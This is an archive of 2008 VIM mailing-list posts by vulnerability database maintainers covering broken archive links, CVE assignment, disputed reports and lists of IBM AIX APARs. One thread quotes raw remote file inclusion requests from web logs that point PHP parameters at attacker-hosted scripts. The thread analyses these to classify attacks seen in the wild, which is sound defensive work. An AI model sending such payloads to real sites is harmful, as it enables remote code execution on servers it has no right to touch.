From coley at mitre.org Mon Mar 3 21:55:36 2008
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 3 Mar 2008 16:55:36 -0500 (EST)
Subject: [VIM] lists.grok.org.uk gone wild
Message-ID: <200803032155.m23LtaRv009446@faron.mitre.org>

Is it just me, or is lists.grok.org.uk renumbering all its archives in seemingly arbitrary fashion, breaking URLs at every whim?

Like, this URL:

http://lists.grok.org.uk/pipermail/full-disclosure/2008-January/059985.html

used to be for "Livelink UTF-7 XSS Vulnerability" but is now an Ubuntu advisory.

And this one:

http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060460.html

used to be for "Move Networks Quantum Streaming Player" but is now for "Backend Cross Site Scripting (XSS)".

- Steve

From jericho at attrition.org Mon Mar 3 22:46:20 2008
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 3 Mar 2008 22:46:20 +0000 (UTC)
Subject: [VIM] lists.grok.org.uk gone wild
In-Reply-To: <200803032155.m23LtaRv009446@faron.mitre.org>
References: <200803032155.m23LtaRv009446@faron.mitre.org>
Message-ID:

: Is it just me, or is lists.grok.org.uk renumbering all its archives in
: seemingly arbitrary fashion, breaking URLs at every whim?

I also ran into a big patch of them that went 404 weeks later. Since then I have been making sure to replace any link with another archive.

From ge at linuxbox.org Mon Mar 3 22:50:19 2008
From: ge at linuxbox.org (Gadi Evron)
Date: Mon, 3 Mar 2008 16:50:19 -0600 (CST)
Subject: [VIM] lists.grok.org.uk gone wild
In-Reply-To:
References: <200803032155.m23LtaRv009446@faron.mitre.org>
Message-ID:

On Mon, 3 Mar 2008, security curmudgeon wrote:
>
> : Is it just me, or is lists.grok.org.uk renumbering all its archives in
> : seemingly arbitrary fashion, breaking URLs at every whim?
>
> I also ran into a big patch of them that went 404 weeks later. Since then
> I have been making sure to replace any link with another archive.
>

Anyone spoke with John?
From coley at mitre.org Wed Mar 5 20:55:37 2008
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 5 Mar 2008 15:55:37 -0500 (EST)
Subject: [VIM] false: 123 Flash Chat RFI
Message-ID: <200803052055.m25Ktbcj019388@faron.mitre.org>

Researcher: F10
Ref: BUGTRAQ:20080228 123 Flash Chat Module for phpBB
URL: http://www.securityfocus.com/archive/1/archive/1/488914/100/0/threaded

123flashchat.php contains:

  $phpbb_root_path = './';
  include($phpbb_root_path . 'extension.inc');
  include($phpbb_root_path . 'common.'.$phpEx);

phpbb_login_chat.php contains:

  $phpbb_root_path = './';
  include($phpbb_root_path . 'extension.inc');
  include($phpbb_root_path . 'common.'.$phpEx);

extension.inc and common.php are not part of the 123 Flash distribution itself; rather, they're part of phpBB's sessions integration as described at

http://www.phpbb.com/kb/article/phpbb2-sessions-integration/

- Steve

From coley at linus.mitre.org Wed Mar 5 21:03:11 2008
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 5 Mar 2008 16:03:11 -0500 (EST)
Subject: [VIM] lists.grok.org.uk gone wild
In-Reply-To:
References: <200803032155.m23LtaRv009446@faron.mitre.org>
Message-ID:

On Mon, 3 Mar 2008, Gadi Evron wrote:

> > I also ran into a big patch of them that went 404 weeks later. Since then
> > I have been making sure to replace any link with another archive.
>
> Anyone spoke with John?

Now that I know it's not just me, I'm sending him an email.
- Steve

From jkouns at opensecurityfoundation.org Sun Mar 9 03:08:57 2008
From: jkouns at opensecurityfoundation.org (jkouns)
Date: Sat, 08 Mar 2008 22:08:57 -0500
Subject: [VIM] netVigilance Security Advisory
Message-ID: <47D354C9.3020103@opensecurityfoundation.org>

Noticed a couple netVigilance advisories with this in the reference section:

http://www.netvigilance.com/advisory0065

External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received

From coley at linus.mitre.org Sun Mar 9 23:57:58 2008
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sun, 9 Mar 2008 19:57:58 -0400 (EDT)
Subject: [VIM] netVigilance Security Advisory
In-Reply-To: <47D354C9.3020103@opensecurityfoundation.org>
References: <47D354C9.3020103@opensecurityfoundation.org>
Message-ID:

NVD is irrelevant - they don't have "write access" to CVE data, so they would have to refer researchers to us anyway.

In this case, he made a request with only a couple of sentences' worth of details, but I asked a follow-up question since I wasn't sure how many CVEs to assign. He answered quickly, but then I dropped the ball. He waited at least a week before releasing.
- Steve

On Sat, 8 Mar 2008, jkouns wrote:

> Noticed a couple netVigilance advisories with this in the reference section:
>
> http://www.netvigilance.com/advisory0065
>
> External References:
> Mitre CVE: ID requested but no answer received
> NVD NIST: ID requested but no answer received
> OSVDB: ID requested but no answer received
>
>

From jericho at attrition.org Wed Mar 12 08:51:58 2008
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 12 Mar 2008 08:51:58 +0000 (UTC)
Subject: [VIM] CVE-2007-6018 - more information
Message-ID:

While catching up on Horde / IMP vulns, I noticed this:

http://lists.horde.org/archives/announce/2008/000365.html

  Many thanks to Secunia for reporting an XSS vulnerability (CVE-2007-6018)
  and working with us to test the fixes.

--

The CVE description doesn't mention XSS, due to lack of details at time of creation it appears.

From jericho at attrition.org Thu Mar 20 10:04:39 2008
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 20 Mar 2008 10:04:39 +0000 (UTC)
Subject: [VIM] RFI BotNet and phpBB 0-day?
Message-ID:

For a while I've noticed a ton of RFI requests made to attrition.org; the frequency and patterns suggest it's a large botnet possibly. I haven't had time to really dig into the logs and learn much about it. Tonight I saw one request come across and got curious how many of these requests were published vulnerabilities versus potential 0-day. Many requests don't have enough information to easily determine the software (e.g. /dir/index.php?id=http://), but this may:

/claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

I don't see reference to "page_tail.php" in CVE or OSVDB. The directory structure suggests it is either in Claroline or phpBB though.

http://www.claroline.net/download/stable.html

Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file above.
http://www.phpbb.com/downloads/

Version 2.0.23 ("legacy") has "page_tail.php" in it.

Version 3.0.0 (phpBB3) has no file by that name.

--

So, does anyone want to see if it is truly vulnerable? If so, we know it's phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we know it is actively being exploited in the wild and discovered as a result of it.

Brian

p.s. While writing this, a full example of one that would be a tad harder to track down, but given the "com_comprofiler" and "mosConfig_absolute_path", shouldn't be that difficult:

/index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f

p.p.s. And an example of an older disclosed vulnerability being used:

/squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

(CVE-2006-2483 / OSVDB 25523)

From theall at tenablesecurity.com Thu Mar 20 13:35:19 2008
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 20 Mar 2008 09:35:19 -0400
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To:
References:
Message-ID:

On Mar 20, 2008, at 6:04 AM, security curmudgeon wrote:

> /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 back in 2006:

http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566
http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Thu Mar 20 13:35:28 2008
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 20 Mar 2008 08:35:28 -0500
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To:
References:
Message-ID: <47E26820.1060405@milw0rm.com>

How goes it Brian,

If you're bored I have a few RFIs for you to go through :)

# wc -l todays-rfi-bots.txt
44737 todays-rfi-bots.txt

The file will show the number of uniq entries that have hit milw0rm in the past 24 hours requesting http inclusions. People forget to remove milw0rm from their rfi scans.

/str0ke

security curmudgeon wrote:
>
> For a while I've noticed a ton of RFI requests made to attrition.org,
> the frequency and patterns suggest it's a large botnet possibly. I
> haven't had time to really dig into the logs and learn much about it.
> Tonight I saw one request come across and got curious how many of
> these requests were published vulnerabilities versus potential 0-day.
> Many requests don't have enough information to easily determine the
> software (e.g. /dir/index.php?id=http://), but this may:
>
> /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
>
> I don't see reference to "page_tail.php" in CVE or OSVDB. The
> directory structure suggests it is either in Claroline or phpBB though.
>
> http://www.claroline.net/download/stable.html
>
> Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file
> above.
>
> http://www.phpbb.com/downloads/
>
> Version 2.0.23 ("legacy") has "page_tail.php" in it.
>
> Version 3.0.0 (phpBB3) has no file by that name.
>
> --
>
> So, does anyone want to see if it is truly vulnerable? If so, we know
> it's phpBB 2.0.23 (and maybe prior), we know the file name and
> variable, and we know it is actively being exploited in the wild and
> discovered as a result of it.
>
> Brian
>
>
>
> p.s.
> While writing this, a full example of one that would be a tad
> harder to track down, but given the "com_comprofiler" and
> "mosConfig_absolute_path", shouldn't be that difficult:
> /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f
>
>
> p.p.s. And an example of an older disclosed vulnerability being used:
> /squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
> (CVE-2006-2483 / OSVDB 25523)
>

From coley at linus.mitre.org Thu Mar 20 17:19:36 2008
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 20 Mar 2008 13:19:36 -0400 (EDT)
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To: <47E26820.1060405@milw0rm.com>
References: <47E26820.1060405@milw0rm.com>
Message-ID:

I tried to do something similar some time ago, automatically classifying incoming RFI requests with their CVE, but it was painful and time-consuming and incomplete, for the reasons you specified. So yeah, there are probably 0-days in our logs. Dunno if it's a botnet, but given Gadi's paper from last year on web server compromises, it's a really good theory.

> > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

I looked at the 2.0.23 source.

Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.

phpBB2's page_tail.php in 2.0.23 also has a direct request prevention:

  if ( !defined('IN_PHPBB') )
  {
     die('Hacking attempt');
  }

and no mention of includePath.

HOWEVER, in Claroline 1.55 (an older version) we have:

  ./claroline155/claroline/phpbb/page_tail.php

But - no apparent luck:

  @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");

and no mention of includePath in that file.

claro_init_footer.inc.php seems clean.

Similar for 1.64.
However - $includePath is used all over the place in Claroline, and apparently uses an unset(), so maybe there's a relationship with an unset bug.

1.42 ZIP file seems corrupted, so I couldn't check it out.

Apropos of nothing, during my investigations, I found a REALLY efficient way to create a huge file:

  grep PATTERN `find . -type file` > myfile

Apparently, my shell creates "myfile" before the find is executed, so grep runs against its own results file. I caught a gig in a matter of seconds :)

- Steve

From jericho at attrition.org Thu Mar 20 18:12:32 2008
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 20 Mar 2008 18:12:32 +0000 (UTC)
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To: <47E26820.1060405@milw0rm.com>
References: <47E26820.1060405@milw0rm.com>
Message-ID:

: If you're bored I have a few RFIs for you to go through :)
:
: # wc -l
: todays-rfi-bots.txt
:
: 44737 todays-rfi-bots.txt
:
: The file will show the number of uniq entries that have hit milw0rm in
: the past 24 hours requesting http inclusions. People forget to remove
: milw0rm from their rfi scans.

Hah, this is what I was thinking of doing but automating it more to pull them out nightly. If time permitted, I was going to get fancy and have it weed out known vulnerabilities. If not, I wonder if there are a few folks that could check them if we mail them here with a little research already done.

Obviously we all want to track vulnerabilities in our respective databases, but these are of specific interest for several reasons. Primarily, they are being actively exploited in the wild and would qualify for 'undercover vulnerabilities' [1].

I'm also curious if these suffer from the 'grep and gripe' false positives that we see on the mail lists, and if the botnet is essentially trying to do inclusions on scripts that aren't really vulnerable in the first place.
.b

[1] http://osvdb.org/blog/?p=227

From noamr at beyondsecurity.com Thu Mar 20 18:31:23 2008
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 20 Mar 2008 20:31:23 +0200
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To:
References: <47E26820.1060405@milw0rm.com>
Message-ID: <200803202031.23359.noamr@beyondsecurity.com>

Hi,

I wrote a while ago a Perl script that goes through the Apache logs and captures anything that looks like an RFI attack.

Problem is, as you guys mentioned, that:

1) Some RFI aren't RFI; they are people that mistype URLs, or double-paste URLs, etc.
2) Some RFI attacks are not viable - rather people testing things out ... like you probably try to SQL inject any site that has a nice number in the URL :)
3) Some RFI attacks are so automated that they will try to attack you even if you don't have anything installed on your computer

If anyone wants this script I can send it over and he can look at the effort I did.

(BTW: The Perl script also sorts and returns unique RFI attacks - in order to minimize the 100k+ RFI our site sees every month)

On Thursday 20 March 2008 20:12:32 security curmudgeon wrote:
> : If your bored I have a few rfi's for you to go through :)
> :
> : # wc -l
> : todays-rfi-bots.txt
> :
> : 44737 todays-rfi-bots.txt
> :
> : The file will show the number of uniq entries that have hit milw0rm in
> : the past 24 hours requesting http inclusions. People forget to remove
> : milw0rm from their rfi scans.
>
> Hah, this is what I was thinking of doing but automating it more to pull
> them out nightly. If time permitted, I was going to get fancy and have it
> weed out known vulnerabilities. If not, I wonder if there are a few folks
> that could check them if we mail them here with a little research already
> done.
>
> Obviously we all want to track vulnerabilities in our respective
> databases, but these are of specific interest for several reasons.
> Primarily, they are being actively exploited in the wild and would qualify
> for 'undercover vulnerabilities' [1].
>
> I'm also curious if these suffer from the 'grep and gripe' false positives
> that we see on the mail lists, and if the botnet is essentially trying to
> do inclusions on scripts that aren't really vulnerable in the first place.
>
> .b
>
> [1] http://osvdb.org/blog/?p=227

--
Noam Rathaus
CTO
noamr at beyondsecurity.com
http://www.beyondsecurity.com
"Know that you are safe."

Beyond Security Finalist for the "Red Herring 100 Global" Awards 2007

From jericho at attrition.org Thu Mar 20 19:34:26 2008
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 20 Mar 2008 19:34:26 +0000 (UTC)
Subject: [VIM] RFI BotNet and phpBB 0-day?
In-Reply-To:
References: <47E26820.1060405@milw0rm.com>
Message-ID:

: Dunno if it's a botnet but given Gadi's paper from last year on web
: server compromises, it's a really good theory.

I say that based on a few things I've seen, and I bet a real analysis would very quickly prove or disprove the theory.

: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
:
: I looked at the 2.0.23 source.
:
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.

Well, don't base it just on that path. I see a LOT of obvious path request screwups:

/pipermail/vim/2006-October/001080.html//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://xdengue01.iespana.es/bds/sefe.txt??

I see these a hundred times a day and they obviously will not work. So seeing /claroline/ in front of the /phpbb/ request was odd, but I didn't take it to mean it was necessarily Claroline, even though it may be.
: ./claroline155/claroline/phpbb/page_tail.php
:
: But - no apparent luck:
:
: @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
:
: and no mention of includePath in that file.
:
: claro_init_footer.inc.php seems clean.
:
: Similar for 1.64.
:
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: bug.
:
: 1.42 ZIP file seems corrupted, so I couldn't check it out.

From George:

Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 back in 2006:

http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566
http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup

From jericho at attrition.org Tue Mar 25 07:04:00 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 07:04:00 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.
IBM AIX NIS User Password Expiration Telnet Bypass
2007-03-07
http://www-1.ibm.com/support/docview.wss?uid=isg1IY95721

IBM AIX tcp_tcpsecure
2007-03-10
http://www-1.ibm.com/support/docview.wss?uid=isg1IY95881

IBM AIX sisraidmgr / sissasraidmgr Local Overflow
2007-03-16
http://www-1.ibm.com/support/docview.wss?uid=isg1IY96184

IBM AIX lsvirprt Local Overflow
2007-03-20
http://www-1.ibm.com/support/docview.wss?uid=isg1IY96274

IBM AIX isakmpd INITIAL_CONTACT Message Remote DoS
2007-03-29
http://www-1.ibm.com/support/docview.wss?uid=isg1IY96709

IBM AIX bos.net.tcp.server
2007-04-09
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97150

IBM AIX bos.net.nfs.client
2007-04-01
http://www-1.ibm.com/support/docview.wss?uid=isg1IY96834

IBM AIX WLM Class kprocs Association Persistence
2007-04-13
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97359

IBM AIX WLM Class rset Update kprocs Race Condition
2007-04-13
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97360
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97251

IBM AIX devices.common.IBM.ib.rte
2007-04-20
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97679

IBM AIX J2 Log Sync List Corruption
2007-04-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97708

IBM AIX Lock Instrumentation DoS
2007-04-24
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97812

From jericho at attrition.org Tue Mar 25 07:50:59 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 07:50:59 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 2)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.
IBM AIX devices.chrp.IBM.lhea.rte hea_config() / hea_async_kproc() NULL Dereference DoS
2007-05-02
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98076

IBM AIX v_pdtfreescb
2007-05-02
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98084

IBM AIX cpupstat
2007-05-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98482

IBM AIX v_scan_compute_weights
2007-05-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98483

IBM AIX DMAPI-enabled Application DoS
2007-05-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98485

IBM AIX dbx
2007-05-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98510

IBM AIX bos.net.nfs.client unget_context
2007-05-17
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98707

IBM AIX bad_vnode_bad_caller
2007-05-17
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98728

IBM AIX bos.pmapi.pmsvcs accumulate_context() Race Condition DoS
2007-05-17
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98733

From jericho at attrition.org Tue Mar 25 08:55:30 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 08:55:30 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 3)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.
IBM AIX bos.rte.lvm cplv
2007-05-17
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98765

IBM AIX arl_iodone
2007-05-17
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98766

IBM AIX MultiThreaded Process Race Condition DoS
2007-05-24
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99144

IBM AIX MPIO Disk eRas Functions
2007-05-24
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99159
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98573
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98353

IBM AIX automount map Symlink
2007-06-01
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99438

IBM AIX Sync inode Handling Race Condition DoS
2007-06-07
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99726

IBM AIX j2 Filesystem iActivate() Freed inode Handling DoS
2007-06-07
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99739

IBM AIX eWLM Local CPU Management ewlm_system
2007-06-07
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99749

IBM AIX SIDL Process set_real_rset
2007-06-09
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99819

From jericho at attrition.org Tue Mar 25 09:21:36 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 09:21:36 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 4)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.
IBM AIX LDAP Username Echo
2007-06-09
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99820

IBM AIX devices.chrp.IBM.lhea.rte Kernel Timer
2007-06-15
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00207

IBM AIX NAMEDSHLIB Export
2007-06-19
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00435
http://www-1.ibm.com/support/docview.wss?uid=isg1IY97325

IBM AIX bos.net.nfs.client Recursive Referral DoS
2007-06-20
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00508

IBM AIX ktimer_delete Double-free
2007-06-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00541

IBM AIX bos.rte.tty TTY Debug CDT Reallocation
2007-06-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00544

IBM AIX devices.pci.14108c00.rte
2007-06-25
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00682

IBM AIX chpasswd non-DES Hashing
2007-06-26
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00748

From jericho at attrition.org Tue Mar 25 18:18:44 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 18:18:44 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 5)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.
IBM AIX WLM rset
2007-06-26
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00765

IBM AIX tx_complete Ethernet Transmission
2007-06-25
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00772
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00698
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01467

IBM AIX devices.common.IBM.ib.rte ICM QpModifyState()
2007-06-26
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00788

IBM AIX JFS2 Errors
2007-06-30
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00948
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05847
http://www-1.ibm.com/support/docview.wss?uid=isg1IY99892

IBM AIX eWLM Kernel Process Creation
2007-07-03
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01029
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01414

IBM AIX walk_thread_table()
2007-07-12
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01474
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02281

IBM AIX SNONE
2007-07-12
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01475
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02282

IBM AIX bos.cifs_fs.rte smbfs_smb_lookup
2007-07-19
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01724
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02273

IBM AIX txLock
2007-07-28
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02001

IBM AIX JS22
2007-07-28
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02003
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02287

From jericho at attrition.org Tue Mar 25 18:44:39 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 18:44:39 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 6)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc.
So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.

IBM AIX RPC Communication yp_all
2007-08-05
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02536
http://www-1.ibm.com/support/docview.wss?uid=isg1IY98802

IBM AIX bos.net.nfs.client Directory Export
2007-08-05
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02576
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02379

IBM AIX bos.mp64 raschk_safe_read
2007-08-05
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02585
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02526

IBM AIX Multiple Security Commands
2007-08-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02838
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01883

IBM AIX devices.common.IBM.fc.rte FC Interface IP Packet DoS
2007-08-11
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02845
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01628

IBM AIX devices.fcp.disk.rte Virtual Optical Disk
2007-08-20
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03363

IBM AIX Process dbx detach
2007-08-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03438
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03134

IBM AIX bos.mp low._s Offset Overflow
2007-08-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03441
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03135

IBM AIX vmgetinfo vmpool Request DoS
2007-09-03
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04161
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04393

IBM AIX bos.aixpert.websm Websm
2007-09-09
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04505
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04499

From jericho at attrition.org Tue Mar 25 19:15:20 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 19:15:20 +0000 (UTC)
Subject: [VIM] slew of AIX APARs of interest (batch 7)
Message-ID:

While frolicking through the IBM APAR slag, I ran across a lot of entries that may be
vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, I'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles.

IBM AIX bos.acct Accounting Schema Reversion
2007-09-09
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04507

IBM AIX bos.net.tcp.client ICMP ECHO Cross-session Disclosure ?
2007-09-10
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04519

IBM AIX bos.net.ipsec.keymgt isakmpd Phase 2 SA Fail Message DoS
2007-09-14
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04955

IBM AIX WLM Class Addition
2007-09-15
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04960

IBM AIX rmmap Segment Handling
2007-09-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05214
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01575
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04749

IBM AIX audit_write Function
2007-09-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05218
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05850
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04149

IBM AIX abend_trap
2007-09-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05223
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04989

IBM AIX _passwdentry_auto Memory Corruption
2007-09-21
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05231
http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05260

From jericho at attrition.org Tue Mar 25 19:22:17 2008
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 25 Mar 2008 19:22:17 +0000 (UTC)
Subject: [VIM] AIX APAR conclusion - notes and oddities
Message-ID:

Wow, talk about brain melt. The APAR database, as seen by regular unauthenticated users, is a complete mess and full of confusion. I posted a quick blog entry the other day about it:

http://osvdb.org/blog/?p=235

First it was HP, then it was Sun.
